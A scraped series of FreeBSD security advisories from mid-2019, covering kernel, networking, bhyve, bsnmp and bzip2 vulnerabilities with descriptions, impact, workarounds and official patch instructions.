-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:23.midi Security Advisory The FreeBSD Project Topic: kernel memory disclosure from /dev/midistat Category: core Module: sound Announced: 2019-08-20 Credits:Peter Holm, Mark Johnston Affects:All supported versions of FreeBSD. Corrected: 2019-08-20 17:53:16 UTC (stable/12, 12.0-STABLE) 2019-08-20 17:50:33 UTC (releng/12.0, 12.0-RELEASE-p10) 2019-08-20 17:54:18 UTC (stable/11, 11.3-STABLE) 2019-08-20 17:50:33 UTC (releng/11.3, 11.3-RELEASE-p3) 2019-08-20 17:50:33 UTC (releng/11.2, 11.2-RELEASE-p14) CVE Name: CVE-2019-5612 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background /dev/midistat is a device file which can be read to obtain a human-readable list of the available MIDI-capable devices in the system. II. Problem Description The kernel driver for /dev/midistat implements a handler for read(2). This handler is not thread-safe, and a multi-threaded program can exploit races in the handler to cause it to copy out kernel memory outside the boundaries of midistat's data buffer. III. Impact The races allow a program to read kernel memory within a 4GB window centered at midistat's data buffer. The buffer is allocated each time the device is opened, so an attacker is not limited to a static 4GB region of memory. On 32-bit platforms, an attempt to trigger the race may cause a page fault in kernel mode, leading to a panic. IV. Workaround No workaround is available. Custom kernels without "device sound" are not vulnerable. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Rebooting for security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch # fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch.asc # gpg --verify midi.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r351264 releng/12.0/ r351260 stable/11/r351265 releng/11.3/ r351260 releng/11.2/ r351260 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5612> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:23.midi.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1cPgVfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cItmQ/9HL5BIP/QUvfcBbhZmZAXa7O7V9Em4auumaUWEPnUaAR0vNKZqMvFXNeN v51/HOwCZte2fCgs8rxSH9ncQR+cUk/3nXO7PZ7pNPNfvuJoPlCV1rIuRrdwm14+ +pZIJpY65gmmXyh5Qa5cw41MEWuDcKluUg38zEROwBpX4h0J/ZuMSARn/s1jj/kJ hy2yzgPTz8gAzkNd8OtQm1CHdFnKWabuAHBlltj9qIA3OvJL+TpIFmzU5jA7wO1n w9GCcz73+IA1RZXu8vPsW9AEc/1LlUrNcyLmJ+bZjW9b7mY9dq+ackvULTzFV21u 5xW2FEX3EBr3
FreeBSD Security Advisory FreeBSD-SA-19:22.mbuf
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:22.mbuf Security Advisory The FreeBSD Project Topic: IPv6 remote Denial-of-Service Category: kernel Module: net Announced: 2019-08-20 Credits:Clement Lecigne Affects:All supported versions of FreeBSD. Corrected: 2019-08-10 00:01:25 UTC (stable/12, 12.0-STABLE) 2019-08-20 17:49:33 UTC (releng/12.0, 12.0-RELEASE-p10) 2019-08-10 00:02:45 UTC (stable/11, 11.3-STABLE) 2019-08-20 17:49:33 UTC (releng/11.3, 11.3-RELEASE-p3) 2019-08-20 17:49:33 UTC (releng/11.2, 11.2-RELEASE-p14) CVE Name: CVE-2019-5611 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background mbufs are a unit of memory management mostly used in the kernel for network packets and socket buffers. m_pulldown(9) is a function to arrange the data in a chain of mbufs. II. Problem Description Due do a missing check in the code of m_pulldown(9) data returned may not be contiguous as requested by the caller. III. Impact Extra checks in the IPv6 code catch the error condition and trigger a kernel panic leading to a remote DoS (denial-of-service) attack with certain Ethernet interfaces. At this point it is unknown if any other than the IPv6 code paths can trigger a similar condition. IV. Workaround For the currently known attack vector systems with IPv6 not enabled are not vulnerable. On systems with IPv6 active, IPv6 fragmentation may be disabled, or a firewall can be used to filter out packets with certain or excessive amounts of extension headers in a first fragment. These rules may be dependent on the operational needs of each site. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Rebooting for security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:22/mbuf.patch # fetch https://security.FreeBSD.org/patches/SA-19:22/mbuf.patch.asc # gpg --verify mbuf.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r350828 releng/12.0/ r351259 stable/11/r350829 releng/11.3/ r351259 releng/11.2/ r351259 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=238787> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5611> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:22.mbuf.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1cPgFfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cK+4w/7BCGyLpeSCIaHMpKdZvSqKc6RptLyxPq1q6XO/5fUxQiBXuwxfZIUO45o VyQCsuVf0QDeT/HaMJAdTr450RlSs1ozyzEmd2iLfwqmpc8JRemihrzHkNMfny1U Y4ffN6zyrOLyFeyQcdbgHUKHwuAvGZFhR/PtPJfWDmULi0vW5PHBGjxOQmxKbbUr 6zcR+gKrm5E3vLW4vD2gvsB1RGyOz
FreeBSD Security Advisory FreeBSD-SA-19:21.bhyve
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:21.bhyve Security Advisory The FreeBSD Project Topic: Insufficient validation of guest-supplied data (e1000 device) Category: core Module: bhyve Announced: 2019-08-06 Credits:Reno Robert Affects:All supported versions of FreeBSD. Corrected: 2019-08-05 22:04:16 UTC (stable/12, 12.0-STABLE) 2019-08-06 17:13:17 UTC (releng/12.0, 12.0-RELEASE-p9) 2019-08-05 22:04:16 UTC (stable/11, 11.3-STABLE) 2019-08-06 17:13:17 UTC (releng/11.3, 11.3-RELEASE-p2) 2019-08-06 17:13:17 UTC (releng/11.2, 11.2-RELEASE-p13) CVE Name: CVE-2019-5609 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background bhyve(8) is a hypervisor that supports running a variety of guest operating systems in virtual machines. bhyve(8) includes an emulated Intel 82545 network interface adapter ("e1000"). II. Problem Description The e1000 network adapters permit a variety of modifications to an Ethernet packet when it is being transmitted. These include the insertion of IP and TCP checksums, insertion of an Ethernet VLAN header, and TCP segmentation offload ("TSO"). The e1000 device model uses an on-stack buffer to generate the modified packet header when simulating these modifications on transmitted packets. When TCP segmentation offload is requested for a transmitted packet, the e1000 device model used a guest-provided value to determine the size of the on-stack buffer without validation. The subsequent header generation could overflow an incorrectly sized buffer or indirect a pointer composed of stack garbage. III. Impact A misbehaving bhyve guest could overwrite memory in the bhyve process on the host. IV. Workaround Only the e1000 device model is affected; the virtio-net device is not affected by this issue. If supported by the guest operating system presenting only the virtio-net device to the guest is a suitable workaround. No workaround is available if the e1000 device model is required. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and restart any affected virtual machines. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:21/bhyve.patch # fetch https://security.FreeBSD.org/patches/SA-19:21/bhyve.patch.asc # gpg --verify bhyve.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart the applicable virtual machines, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r350619 releng/12.0/ r350647 stable/11/r350619 releng/11.3/ r350647 releng/11.2/ r350647 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5609> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:21.bhyve.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6Hiu
FreeBSD Security Advisory FreeBSD-SA-19:20.bsnmp
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:20.bsnmp Security Advisory The FreeBSD Project Topic: Insufficient message length validation in bsnmp library Category: contrib Module: bsnmp Announced: 2019-08-06 Credits:Guido Vranken Affects:All supported versions of FreeBSD. Corrected: 2019-08-06 16:11:16 UTC (stable/12, 12.0-STABLE) 2019-08-06 17:12:17 UTC (releng/12.0, 12.0-RELEASE-p9) 2019-08-06 16:12:43 UTC (stable/11, 11.3-STABLE) 2019-08-06 17:12:17 UTC (releng/11.3, 11.3-RELEASE-p2) 2019-08-06 17:12:17 UTC (releng/11.2, 11.2-RELEASE-p13) CVE Name: CVE-2019-5610 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The bsnmp software library is used for the Internet SNMP (Simple Network Management Protocol). As part of this it includes functions to handle ASN.1 (Abstract Syntax Notation One). II. Problem Description A function extracting the length from type-length-value encoding is not properly validating the submitted length. III. Impact A remote user could cause, for example, an out-of-bounds read, decoding of unrelated data, or trigger a crash of the software such as bsnmpd resulting in a denial of service. IV. Workaround No workaround is available. V. Solution Perform one of the following: Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:20/bsnmp.patch # fetch https://security.FreeBSD.org/patches/SA-19:20/bsnmp.patch.asc # gpg --verify bsnmp.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart all daemons that use the library, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r350637 releng/12.0/ r350646 stable/11/r350638 releng/11.3/ r350646 releng/11.2/ r350646 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5610> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:20.bsnmp.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1Jt1lfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cKtBBAAltxFzxuMqWCgJoL9SemLRQxGGk0hRFdN5b78mgVdk2lfDgVz8U7mVM6v XbcCa4lIy7wMYpUdEySAZLR2ENt0xdpx7oQ6lAg5fnnvrUvom4wU9ruxEs5txFVL K6RaJnQJyOkI2c/LYvI/ZYmuc29/Nt3p/DvVe7wq86taoqUufN11MXkrRHgn68N3 7vewixzWpqH5L/aY2qP1d+Xe3QmHX0IcFqeo4U3/3G4wUGRCfHtaENY4w5eUbCa2 1Qk0oS9iUdX1IJjM5l1ccoFqsjbcO6vNS337qeYNKhLspXMQPwoS0K0HfB6LKt1D dCBFoXu/qUFjf3qqbpcqGEFrFPZjlNmC4R0Ngx1rfZ1t1dXbj83NOOE1okd3Gb/V TPDU/jzwt+/6DE6ryNQpeanPdim83w/j+qeA0UaTyxlbj+oSz1gU9Ckaauf+9peI GT8TPnrgmFlYg2tkYl4tbq5LtRstPGZYguqEt5SHCxBOg3dxByMPzikSFUL9oNxS 9GX7JZT36J20f62hG8Watp2y3W0QsMjJpxF9OojRU6B15Z4Q2aCht4F6DnvEkVfN 1GvS5NAHPHU09TniSgYK3ThkoYrLYykhsXPmJmETV7DU1Qhny1p8H0NwIwB20
FreeBSD Security Advisory FreeBSD-SA-19:19.mldv2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:19.mldv2 Security Advisory The FreeBSD Project Topic: ICMPv6 / MLDv2 out-of-bounds memory access Category: core Module: net Announced: 2019-08-06 Credits:CJD of Apple Affects:All supported versions of FreeBSD. Corrected: 2019-08-06 17:13:41 UTC (stable/12, 12.0-STABLE) 2019-08-06 17:11:17 UTC (releng/12.0, 12.0-RELEASE-p9) 2019-08-06 17:15:46 UTC (stable/11, 11.3-STABLE) 2019-08-06 17:11:17 UTC (releng/11.3, 11.3-RELEASE-p2) 2019-08-06 17:11:17 UTC (releng/11.2, 11.2-RELEASE-p13) CVE Name: CVE-2019-5608 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background MLDv2 is the Multicast Listener Discovery protocol, version 2. It is used by IPv6 routers to discover multicast listeners. II. Problem Description The ICMPv6 input path incorrectly handles cases where an MLDv2 listener query packet is internally fragmented across multiple mbufs. III. Impact A remote attacker may be able to cause an out-of-bounds read or write that may cause the kernel to attempt to access an unmapped page and subsequently panic. IV. Workaround No workaround is available. Systems not using IPv6 are not affected. V. Solution Perform one of the following: Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and reboot. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Reboot for security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.2, FreeBSD 11.3] # fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.11.patch # fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.11.patch.asc # gpg --verify mldv2.11.patch.asc [FreeBSD 12.0] # fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.12.patch # fetch https://security.FreeBSD.org/patches/SA-19:19/mldv2.12.patch.asc # gpg --verify mldv2.12.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r350648 releng/12.0/ r350644 stable/11/r350650 releng/11.3/ r350644 releng/11.2/ r350644 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5608> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:19.mldv2.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1Jt1RfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cLzTA/+OyyukXWH7rfwMhOlpD60UH4hxN3purvdNeBe4ZxlYvtf8gSUzS1VbK5r NR9D2HiYRlmaePOil5myan6cVkrKoANoWTrQsCcsFLe6KKbiKlQDx/btbENmCMsR VoS0ZPx3l9iGuVUwDk6k1JXwKCcO3U3dCDYEI941hEKxYadR+twUP3JOceg8Zn0h oODXW7LcPXWQKAyFc0Kun1VrjrUGdRGfqk30joR20GP2IjgQceFHKUbiOyBbbIjW +UVvp2wPBxXvcXNPTpcIpTW5UGJBHCT2OsDulh7hqpiWf78VE8BoksKAvDjtI4i0 15fmwn7tmQ3aGWK3WoaKWUOXZUlKrxRQDzGyAZ3LzOqPWhv12tJjNJhjnRmCVLfo +F4I/MHzPgjitZhv8gfn+MRiPG4E1ueAYnPQWiR3qRCLQGhemVdKZIAVnYg6NGpQ Jgsr1QS8
FreeBSD Security Advisory FreeBSD-SA-19:18.bzip2
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:18.bzip2 Security Advisory The FreeBSD Project Topic: Multiple vulnerabilities in bzip2 Category: contrib Module: bzip2 Announced: 2019-08-06 Affects:All supported versions of FreeBSD. Corrected: 2019-07-04 07:29:18 UTC (stable/12, 12.0-STABLE) 2019-08-06 17:09:47 UTC (releng/12.0, 12.0-RELEASE-p9) 2019-07-04 07:32:25 UTC (stable/11, 11.3-STABLE) 2019-08-06 17:09:47 UTC (releng/11.3, 11.3-RELEASE-p2) 2019-08-06 17:09:47 UTC (releng/11.2, 11.2-RELEASE-p13) CVE Name: CVE-2016-3189, CVE-2019-12900 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The bzip2(1)/bunzip2(1) utilities and the libbz2 library compress and decompress files using an algorithm based on the Burrows-Wheeler transform. They are generally slower than Lempel-Ziv compressors such as gzip, but usually provide a greater compression ratio. The bzip2recover utility extracts blocks from a damaged bzip2(1) file, permitting partial recovery of the contents of the file. II. Problem Description The decompressor used in bzip2 contains a bug which can lead to an out-of-bounds write when processing a specially crafted bzip2(1) file. bzip2recover contains a heap use-after-free bug which can be triggered when processing a specially crafted bzip2(1) file. III. Impact An attacker who can cause maliciously crafted input to be processed may trigger either of these bugs. The bzip2recover bug may cause a crash, permitting a denial-of-service. The bzip2 decompressor bug could potentially be exploited to execute arbitrary code. Note that some utilities, including the tar(1) archiver and the bspatch(1) binary patching utility (used in portsnap(8) and freebsd-update(8)) decompress bzip2(1)-compressed data internally; system administrators should assume that their systems will at some point decompress bzip2(1)-compressed data even if they never explicitly invoke the bunzip2(1) utility. IV. Workaround No workaround is available. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, and restart daemons if necessary. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:18/bzip2.patch # fetch https://security.FreeBSD.org/patches/SA-19:18/bzip2.patch.asc # gpg --verify bzip2.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart all daemons that use the library, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r349717 releng/12.0/ r350643 stable/11/r349718 releng/11.3/ r350643 releng/11.2/ r350643 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3189> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12900> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:18.bzip2.asc> -BEGIN PGP SIGNATU
FreeBSD Security Advisory FreeBSD-SA-19:16.bhyve
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:16.bhyve Security Advisory The FreeBSD Project Topic: Bhyve out-of-bounds read in XHCI device Category: core Module: bhyve Announced: 2019-07-24 Credits:Reno Robert Affects:All supported versions of FreeBSD. Corrected: 2019-07-23 17:48:37 UTC (stable/12, 12.0-STABLE) 2019-07-24 12:56:06 UTC (releng/12.0, 12.0-RELEASE-p8) 2019-07-23 17:48:37 UTC (stable/11, 11.2-STABLE) 2019-07-24 12:56:06 UTC (releng/11.2, 11.2-RELEASE-p12) 2019-07-24 12:56:06 UTC (releng/11.3, 11.3-RELEASE-p1) CVE Name: CVE-2019-5604 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background bhyve(8) is a hypervisor that supports running a variety of virtual machines (guests). bhyve includes an emulated XHCI device. II. Problem Description The pci_xhci_device_doorbell() function does not validate the 'epid' and 'streamid' provided by the guest, leading to an out-of-bounds read. III. Impact A misbehaving bhyve guest could crash the system or access memory that it should not be able to. IV. Workaround No workaround is available, however systems not using bhyve(8) for virtualization are not vulnerable. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. No reboot is required. Rather the bhyve(8) process for vulnerable virtual machines should be restarted. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Restart any bhyve virtual machines or reboot the system. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:16/bhyve.patch # fetch https://security.FreeBSD.org/patches/SA-19:16/bhyve.patch.asc # gpg --verify bhyve.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart any bhyve virtual machines, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r350246 releng/12.0/ r350285 stable/11/r350247 releng/11.2/ r350285 releng/11.3/ r350285 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5604> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:16.bhyve.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04WmtfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cI+Jw//TcrKrFaXkEJtqzspjoeK9YKwNwj30ewdb/Ph3GdcgVoQmfJVsWPcmcM9 +dewKdl7gGLhVhoJ+3f3oFzlDcqSxFLHcNwSW5J7P8Zt+7ZpQzwH8pfB6S8T1Nk6 77Sv5hYrjy8kdSh6Z/c8BkAQrhEFYO09xej8ekQ1B+iL2N4ErexpCNTMKlP96pGS 0/4tso5gdcwrc1t6HHGffFkjItgnE8Lvgr1ZsSHbcRGAc3nqy3n21U+VH+fecAzK 0NBO3HQeCbRIEdAms3jMLcAJGrs60VBN0nnWqLxlGBb10hY7Si0NkgbWOP2g/Elf J+K4SHTFXbhIGrpsrEdvSVPvytQ8gKOSys5luvtLjt0Yhll08eEUDVzaIk//Hsak BcUSlKHULLkVTJZvdZAHUMHJOMPpSAh61DuFcM+pxAt5E9rmgX+HnPBs1yLbgd23 NaQadFC126T+AW5W5GyOs2BIEo4bdTNHqONF7gmR4a5bv6/7GWZz/QNsep43jDZH 43lur
FreeBSD Security Advisory FreeBSD-SA-19:17.fd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:17.fd Security Advisory The FreeBSD Project Topic: File description reference count leak Category: core Module: unix Announced: 2019-07-24 Credits:Mark Johnston Affects:All supported versions of FreeBSD. Corrected: 2019-07-22 19:25:05 UTC (stable/12, 12.0-STABLE) 2019-07-24 12:57:49 UTC (releng/12.0, 12.0-RELEASE-p8) 2019-07-22 19:27:23 UTC (stable/11, 11.2-STABLE) 2019-07-24 12:57:49 UTC (releng/11.2, 11.2-RELEASE-p12) 2019-07-24 12:57:49 UTC (releng/11.3, 11.3-RELEASE-p1) CVE Name: CVE-2019-5607 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background UNIX-domain sockets are used for inter-process communication. It is possible to use UNIX-domain sockets to transfer rights, encoded as file descriptors, to another process. Rights are encapsulated in control messages, and multiple such messages may be transmitted with a single system call. II. Problem Description If a process attempts to transmit rights over a UNIX-domain socket and an error causes the attempt to fail, references acquired on the rights are not released and are leaked. This bug can be used to cause the reference counter to wrap around and free the corresponding file structure. III. Impact A local user can exploit the bug to gain root privileges or escape from a jail. IV. Workaround No workaround is available. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install # shutdown -r +10min "Rebooting for a security update" 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 11.2] # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.2.patch # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.2.patch.asc # gpg --verify fd.11.2.patch.asc [FreeBSD 11.3] # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.patch # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.11.patch.asc # gpg --verify fd.11.patch.asc [FreeBSD 12.0] # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.12.patch # fetch https://security.FreeBSD.org/patches/SA-19:17/fd.12.patch.asc # gpg --verify fd.12.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r350222 releng/12.0/ r350286 stable/11/r350223 releng/11.2/ r350286 releng/11.3/ r350286 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5607> The latest revision of this advisory is available at 